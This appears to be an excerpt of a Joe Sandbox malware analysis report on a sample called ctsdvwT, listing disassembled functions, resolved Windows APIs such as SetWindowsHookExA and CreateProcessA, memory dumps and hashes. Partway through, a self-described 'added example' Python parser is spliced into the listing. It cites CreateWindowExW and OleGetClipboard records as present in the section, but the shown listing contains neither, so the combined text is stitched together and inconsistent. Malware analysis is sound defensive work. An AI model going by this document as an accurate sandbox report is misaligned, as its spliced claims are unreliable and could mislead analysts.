                                            • Opcode Fuzzy Hash: 521af85f89d782327b1ad9527c60a72e9dab374bf6c69bbc7c4d1cf70deb3ddf
                                            • Instruction Fuzzy Hash: 793103B4D0520CDFDB54DF9ACA88B9DBBF5EF48304F248029E504AB390D7B59944CB95

                                             Control-flow Graph
                                             • Blocks: 1507 686fe23-686fe24; 1508 686fe26-686fe72; 1509 686fe7a-686fe7c; 1511 686fe7e-686fe87; 1517 686fe74; 1512 686fe91-686feb0 SetWindowsHookExA; 1513 686fe89-686fe8e; 1515 686feb2-686feb8; 1516 686feb9-686fed9
                                             • Edges: 1507->1508, 1507->1509, 1508->1511, 1508->1517, 1509->1511, 1511->1512, 1511->1513, 1512->1515, 1512->1516, 1513->1512, 1515->1516, 1517->1509
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0686FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: dd3432b712f416f7f4892b96778bb839c2d1d7b258f5fd6d7632107a4037f873
                                            • Instruction ID: a3d0fa748a52b2b0c5bc3a3d8f651bcc5e5ec91e937b8436d487fd28f576b4c0
                                            • Opcode Fuzzy Hash: dd3432b712f416f7f4892b96778bb839c2d1d7b258f5fd6d7632107a4037f873
                                            • Instruction Fuzzy Hash: 00216671C002098FCB14DFAAE844AEEBFF5EB48310F14841AE559A7251C774A940CFA0

                                             Control-flow Graph
                                             • Blocks: 1520 686c6f0-686c75d; 1521 686c760-686c78c DuplicateHandle; 1522 686c795-686c7b2; 1523 686c78e-686c794
                                             • Edges: 1520->1521, 1521->1522, 1521->1523, 1523->1522
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0686C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: d69ee81eb83e61cc14e769603956bcaf9496b3a6a5a136afa369dee14349957f
                                            • Instruction ID: 201066db2a344a482f519a18d4250bf1174e84c71b78d17af8e5a35c83f42ec4
                                            • Opcode Fuzzy Hash: d69ee81eb83e61cc14e769603956bcaf9496b3a6a5a136afa369dee14349957f
                                            • Instruction Fuzzy Hash: 4221E2B5D002489FDB50CFAAD984AEEBFF5FB48310F14841AE958A7350D378A944CFA0

                                             Control-flow Graph
                                             • Blocks: 1526 686c6f8-686c75d; 1527 686c760-686c78c DuplicateHandle; 1528 686c795-686c7b2; 1529 686c78e-686c794
                                             • Edges: 1526->1527, 1527->1528, 1527->1529, 1529->1528
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0686C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 816bf2c3800c2334c3b6b1664fa5bf157f3171e993fae032c6a9a4a204c58255
                                            • Instruction ID: 05c69a2696242a0fc70c603f330988529bdba80509af2d085d82e6d7a092ed60
                                            • Opcode Fuzzy Hash: 816bf2c3800c2334c3b6b1664fa5bf157f3171e993fae032c6a9a4a204c58255
                                            • Instruction Fuzzy Hash: 4321E4B5D002089FDB10CFAAD984ADEBBF8FB48310F14841AE958A7310D378A944CFA0
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0686FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: a62f5b53de222f8c18719d4e3108363dbb71a4251dabff1b0110d0e4b6a00cb3
                                            • Instruction ID: 319d80fe19d58b8d3ddb9dd56a09ec0d532b4ddd4b07456585196050d8bcac34
                                            • Opcode Fuzzy Hash: a62f5b53de222f8c18719d4e3108363dbb71a4251dabff1b0110d0e4b6a00cb3
                                            • Instruction Fuzzy Hash: D52110B5D002099FCB14DFAAD844BEEFBF5FB88310F14842AE518A7250C778A944CFA1
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06867956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 8ebf38ec790acebeadf8d6a4cb8db89cca95565c54c437a79a0a1b6e90b03591
                                            • Instruction ID: cf4a6d4a1ffbfa0340642dd482faa205d8c5f4e1c33a4ec783c957667673ca1a
                                            • Opcode Fuzzy Hash: 8ebf38ec790acebeadf8d6a4cb8db89cca95565c54c437a79a0a1b6e90b03591
                                            • Instruction Fuzzy Hash: 801120B1C002498FDB10DF9AC444A9EFBF4EB48218F10842AE529B7200D379A545CFA0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06867956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 0a2441a4f0a9fe89fbef28e25ba098863df697c1a8b5b696abd0ebf67949efe3
                                            • Instruction ID: 600981918acc488b4d3040033a413bd92f494c9bacfb85334c5d228f0ba47b48
                                            • Opcode Fuzzy Hash: 0a2441a4f0a9fe89fbef28e25ba098863df697c1a8b5b696abd0ebf67949efe3
                                            • Instruction Fuzzy Hash: D0110FB6C002498FDB10DF9AC844ADEFBF4EB89228F14841AD969B7300D379A545CFA1
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0686D89D), ref: 0686D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: a61757bcd234c6cd0e68be944d0ef279e8216216e1339f98c59f06ce3acbffa8
                                            • Instruction ID: 1ad75299d81c33a281411b30f7f743eee32e68dccea1bd372811ca6b4adf0bbc
                                            • Opcode Fuzzy Hash: a61757bcd234c6cd0e68be944d0ef279e8216216e1339f98c59f06ce3acbffa8
                                            • Instruction Fuzzy Hash: 501133B1900248CFCB10DF9AD444B9EFBF8EF48314F20841AE518A3250D379A944CFA0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0686E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 1cd74cdd0b9de4e1ca37baf5aed9edfc3a1d6eed596a78ec8218cd4fd388488a
                                            • Instruction ID: b3e2dc6fce56650ded05cda83d5c8a75891ac7692c0d14dac7cd4ee65c533ec0
                                            • Opcode Fuzzy Hash: 1cd74cdd0b9de4e1ca37baf5aed9edfc3a1d6eed596a78ec8218cd4fd388488a
                                            • Instruction Fuzzy Hash: BD1145B58043488FDB20DF9AC948BDEBBF4EB48314F24841AE558A7300D379A544CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0686E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: bd3abf7894aec84242fb842e3de452d0b1950bdb26ca6c38653946024997ec87
                                            • Instruction ID: 0355fac74785d2cc56ef0ed392758bb22e23ea131e18afdf8fcf4770d3134a57
                                            • Opcode Fuzzy Hash: bd3abf7894aec84242fb842e3de452d0b1950bdb26ca6c38653946024997ec87
                                            • Instruction Fuzzy Hash: 8A1145B58043488FDB20DF9AC448BDEBBF4EB48314F10841AE519A3200D378A944CFA4
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0686E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 749c7de420ccf9a0db497da785d19eb1c1fa58ac1beb4af34e9d4212c184a512
                                            • Instruction ID: 0aa7dc34446f3cbe30f47131922e2481214dfe0d2954f1853b4fa90aa60d619a
                                            • Opcode Fuzzy Hash: 749c7de420ccf9a0db497da785d19eb1c1fa58ac1beb4af34e9d4212c184a512
                                            • Instruction Fuzzy Hash: 6D1115B58042498FDB20DF9AD548BDEFFF8EB48324F14845AE559A3200D379A544CFA5
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0686D89D), ref: 0686D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 408d00f962f3c6b99a87607d7d881f6165b9fff7417d0d9c06057f4123112859
                                            • Instruction ID: 0dd04220dd244b61a0d972f7398eab3f1a0f7ec1275e55aa76a33c35fd15946a
                                            • Opcode Fuzzy Hash: 408d00f962f3c6b99a87607d7d881f6165b9fff7417d0d9c06057f4123112859
                                            • Instruction Fuzzy Hash: 341130B1900249CFDB10DF9AD589BDEFBF4EF48314F20845AE528A3610D378A944CFA0
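The per-function records above all share one fixed layout (an optional control_flow_graph line, an APIs list of "Name.MODULE(args), ref: ADDR" entries, the Memory Dump Source with its Offset, and the Similarity fields ending in the Instruction Fuzzy Hash). The following Python is an added example, not Joe Sandbox tooling and not code from this report: it parses records in that layout and groups the resolved API references by the dump they were carved from, so an analyst can see at a glance that the SetWindowsHookExA, OleGetClipboard and CreateWindowExW references in this section all land in the dump at offset 06860000, while the 01870000 records here carry no API references at all. The sample input is a constructed, abridged copy of four records from this section; the regular expressions are inferred from the layout shown here and are assumptions about the format, not a published Joe Sandbox specification.

```python
"""Group Joe Sandbox per-function records by memory dump (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict

# Constructed sample: abridged copies of four records from this report section
# (control_flow_graph lines shortened; bullets and field names as in the report).
SAMPLE = """\
Control-flow Graph
control_flow_graph 1434 6868998-68689fe 1435 6868a00-6868a06 1434->1435 1438 6868a1b-6868aba CreateWindowExW 1436->1438
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06868AAA
Memory Dump Source
• Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
• API ID: CreateWindow
• Instruction Fuzzy Hash: 5641C0B1D00309AFDB14CF9AC984ADEBBB5FF48314F24812AE818BB250D775A945CF91
Control-flow Graph
control_flow_graph 1482 686e2cc-686e328 1483 686e332-686e370 OleGetClipboard 1482->1483
APIs
Memory Dump Source
• Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
• API ID: Clipboard
• Instruction Fuzzy Hash: 8D3143B0D01248DFDB10CFA9CA88BCEBBF1EF48304F248019E144AB3A0D7B45945CB65
Control-flow Graph
control_flow_graph 1512 686fe91-686feb0 SetWindowsHookExA 1511->1512
APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0686FEA3
Memory Dump Source
• Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
• API ID: HookWindows
• Instruction Fuzzy Hash: 00216671C002098FCB14DFAAE844AEEBFF5EB48310F14841AE559A7251C774A940CFA0
Strings
Memory Dump Source
• Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
• API ID:
• String ID: LR]q
• Instruction Fuzzy Hash: 84318371E202099FDB15CFA8C48979EB7B1EF85304F208529E816E7251E774DA41CB91
"""

# Regexes inferred from the report layout (assumption, not a Joe Sandbox spec).
API_LINE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD = re.compile(r"^• (?P<key>[A-Za-z ]+): ?(?P<val>.*)$")
OFFSET = re.compile(r"Offset: ([0-9A-Fa-f]+)")
# Callee name attached to a basic-block range in a control_flow_graph line,
# e.g. "686fe91-686feb0 SetWindowsHookExA"; "call <hex>" targets are skipped.
CFG_CALL = re.compile(r"\b[0-9a-f]+(?:-[0-9a-f]+)? (?!call\b)([A-Za-z_]\w+)")

HOOK = "SetWindowsHookEx (global hook, keylogging capability)"
CLIPBOARD = "clipboard read (OleGetClipboard/GetClipboardData)"
WINDOW = "CreateWindowEx (message target for hooks/clipboard)"
INDICATORS = {"SetWindowsHookEx": HOOK, "OleGetClipboard": CLIPBOARD,
              "GetClipboardData": CLIPBOARD, "CreateWindowEx": WINDOW}


def classify(api_name):
    """Map an API name (any A/W suffix) to a surveillance indicator label, or None."""
    for prefix, label in INDICATORS.items():
        if api_name.startswith(prefix):
            return label
    return None


def parse_records(text):
    """Split report text into records; each record ends at its Instruction Fuzzy Hash line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if cur is None:
            cur = {"apis": [], "cfg_calls": [], "fields": {}, "offset": None}
        if line.startswith("control_flow_graph"):
            cur["cfg_calls"].extend(CFG_CALL.findall(line))
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].append((m["api"], m["module"], m["ref"]))
            continue
        m = OFFSET.search(line)
        if m:
            cur["offset"] = m.group(1)
        m = FIELD.match(line)
        if m:
            cur["fields"][m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":  # record terminator
                records.append(cur)
                cur = None
    return records


def summarize(records):
    """Group API names and indicators by the dump offset each function was carved from."""
    by_dump = defaultdict(lambda: {"functions": 0, "apis": set(), "indicators": set()})
    for rec in records:
        entry = by_dump[rec["offset"]]
        entry["functions"] += 1
        # A record with an empty APIs heading (the OleGetClipboard ones in this
        # report) still names the callee in its control-flow graph, so merge both.
        names = {api for api, _, _ in rec["apis"]} | set(rec["cfg_calls"])
        entry["apis"] |= names
        for name in names:
            label = classify(name)
            if label:
                entry["indicators"].add(label)
    return dict(by_dump)


def surveillance_dumps(summary):
    """Dumps holding both a global hook and a clipboard read: carve and attribute these first."""
    return sorted(off for off, e in summary.items()
                  if off and HOOK in e["indicators"] and CLIPBOARD in e["indicators"])


if __name__ == "__main__":
    summary = summarize(parse_records(SAMPLE))
    for off, entry in sorted(summary.items(), key=lambda kv: kv[0] or ""):
        print(off, entry["functions"], sorted(entry["apis"]), sorted(entry["indicators"]))
    print("carve first:", surveillance_dumps(summary))
```

Two caveats when using this on a full report: the listing only resolves what the static pass could resolve, so a `?` in an argument list (the idHook of SetWindowsHookExA here is `?`) means the hook type is not visible in this section and should be taken from the behavioural signatures rather than inferred from the disassembly records; and the same function can appear several times (the duplicated DuplicateHandle and OleInitialize records above), so counts are of records, not of distinct functions.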
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 720badb42537ca036692c52c7556f1a838fefe0134c8801d0f553456bd63199a
                                            • Instruction ID: d2b1f7ebf3d3fad739de96fcd92b97d01a3c809fca338a76e2233747054fa070
                                            • Opcode Fuzzy Hash: 720badb42537ca036692c52c7556f1a838fefe0134c8801d0f553456bd63199a
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8df25a4f9d6291d8326f941a7f8b2d3fd04aec42d48eb8f345ae9fb64b5aa8
                                            • Instruction ID: f2cb3a4c7f82bf47b248ecc42de4227572f832813a03fdbabd42650a661bb5cd
                                            • Opcode Fuzzy Hash: bd8df25a4f9d6291d8326f941a7f8b2d3fd04aec42d48eb8f345ae9fb64b5aa8
                                            • Instruction Fuzzy Hash: 03218930B00206CFDB65DB68C5597AEB7F2AB49344F6004A9D506EB7A0DF36DE05CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b26609bc9fec58b38cde4c8a554aeda30bbc32c23acbc4ad7d8b3807d98e7467
                                            • Instruction ID: 2f55b4d0c22abb870b8f4d44e14b9cde7d6b7e09bbd2c85f8cf7e034369cedce
                                            • Opcode Fuzzy Hash: b26609bc9fec58b38cde4c8a554aeda30bbc32c23acbc4ad7d8b3807d98e7467
                                            • Instruction Fuzzy Hash: 6721E634700205CFDB15DB78D559AAEBBF5AB89705F1408A8E406EB3A5DB36DE00CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 906a7feb05d88f93f6390bfc6b5addd596fded637f7a67078b9bf99b2fa0614f
                                            • Instruction ID: d094fca90629e1fb0e759f3e4bf57a2f2095cb8ecbe1b427429039c9ceb8cd1f
                                            • Opcode Fuzzy Hash: 906a7feb05d88f93f6390bfc6b5addd596fded637f7a67078b9bf99b2fa0614f
                                            • Instruction Fuzzy Hash: AD1126B6F012415FCB11AB78EC8C66E7BF9EB88340F148465E905C3745EB39C902C792
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68eeb4d875c5e49555e79d8f2f5f16e2ceea5de4146e69e78bd8338dd14320e3
                                            • Instruction ID: 046e7a09cdd055b6a1e990c338c3560d2d1c601af926908582dca95a593bdc12
                                            • Opcode Fuzzy Hash: 68eeb4d875c5e49555e79d8f2f5f16e2ceea5de4146e69e78bd8338dd14320e3
                                            • Instruction Fuzzy Hash: 7311D372A003059FCB16EFBC84841AD7BF5AF16310B1800B9E805EB282E735CA418BA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cbeda7dac35f5d9d4e09318155a2af13895ef6f1315baf623b0291859e97236
                                            • Instruction ID: 9d7377fb5d890351cccf965235051b9978fb5aaa910b899a54711aec4198ba1e
                                            • Opcode Fuzzy Hash: 0cbeda7dac35f5d9d4e09318155a2af13895ef6f1315baf623b0291859e97236
                                            • Instruction Fuzzy Hash: 08118F30B002088BDF655A7DD84476E7699EB4B324F204979F406CB362DA75CE858FD1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1b65d11d10dc74b7b1a7db61777d0b255e06dab7ffc962a42a48e9a315b1835
                                            • Instruction ID: d7799af8b43a37e00bf879ad72a3e6f7c6a35f09f678c74719fc08a12a4d37cf
                                            • Opcode Fuzzy Hash: e1b65d11d10dc74b7b1a7db61777d0b255e06dab7ffc962a42a48e9a315b1835
                                            • Instruction Fuzzy Hash: 90014071A003158FCB65EFBC84541ADBBF5EF49310B140479E90AF7681E635DA428BA2
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258109077.000000000182D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0182D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_182d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 4aa95f39c5b04fd6865ee37d1715774fcc3930c8cc0571d3a1adbc9ab94977c7
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: D311D075504280CFDB12CF54D5C4B15FF61FB44314F24C6A9D8498B666C33AD54BCB62
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 986dcfcfc9358c6b8adee9b4f4eb55d04317def99bcc669ff9da1bc4b9147a12
                                            • Instruction ID: 3a1706b8839cef0237a51f5d0034a3bfed76f7433f2a349d267f8d2a5d507bb9
                                            • Opcode Fuzzy Hash: 986dcfcfc9358c6b8adee9b4f4eb55d04317def99bcc669ff9da1bc4b9147a12
                                            • Instruction Fuzzy Hash: 0A01B531A001058FDB04EF99E984B8ABBBAFF84320F548174D80C5B299DB74EA45C7A1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38980a288288ddb14ee2fa669baee669a6860842933215a1f7fd59a62d50e691
                                            • Instruction ID: 0a8a2654ace13cb92f0cdd4386b012c8e8f357f7883d9a6dfdaaed995adc320c
                                            • Opcode Fuzzy Hash: 38980a288288ddb14ee2fa669baee669a6860842933215a1f7fd59a62d50e691
                                            • Instruction Fuzzy Hash: 4011C930E00609DFDF25FA98E9987ECB771AF75319F241529D011F2190EB348AC5CB26
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3086e038b259e02769096bf00a996aaa54029ef121b1251273709d38c9dba200
                                            • Instruction ID: e78a6695eb05d0e1e1f38b11bb63375f32dbf0c2f7849a28521c2dc51d5d559f
                                            • Opcode Fuzzy Hash: 3086e038b259e02769096bf00a996aaa54029ef121b1251273709d38c9dba200
                                            • Instruction Fuzzy Hash: 46017171900209AFCB45EFB8F944A9D7BB9EF48304F5041B4C4049B254DE3A5F098B81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73d82ffb4ead45f088bfd1057afa1500703b8cdcf14adbfa4756b15da82be411
                                            • Instruction ID: 7b5565c3f4291f437dcc2be363f9a815e87614de38b84b2e0cce371b88e64a78
                                            • Opcode Fuzzy Hash: 73d82ffb4ead45f088bfd1057afa1500703b8cdcf14adbfa4756b15da82be411
                                            • Instruction Fuzzy Hash: 01F02473A04254CBDB26CBBC98941ACBFA1EF6931171C00E7E906EBA92D325D642CB51
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f807b349616a025faeaf2a8f20d47d05f682fdff1e0066caf7d419bec2e0c35
                                            • Instruction ID: 786d4a07860cd5eadb275131cb235c2db13e5dd6216bdb50c10c4fc1c02c9ba3
                                            • Opcode Fuzzy Hash: 5f807b349616a025faeaf2a8f20d47d05f682fdff1e0066caf7d419bec2e0c35
                                            • Instruction Fuzzy Hash: 68F01271940109AFCB45EFB8F94499D7BB9EF48304F505574C40497254DE365F098B85

                                            Execution Graph

Execution Coverage: 10.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 146
Total number of Limit Nodes: 8

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57B76
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57B76
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013DD58E,?,?,?,?,?), ref: 013DD64F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013D59C9
